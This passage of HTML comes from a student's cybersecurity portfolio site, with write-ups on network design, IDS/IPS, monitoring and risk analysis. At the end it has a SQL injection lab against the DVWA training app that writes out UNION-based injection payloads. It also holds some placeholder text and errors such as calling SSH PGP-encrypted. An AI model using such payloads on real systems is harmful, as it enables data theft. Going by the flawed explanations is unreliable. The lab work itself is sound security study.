          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
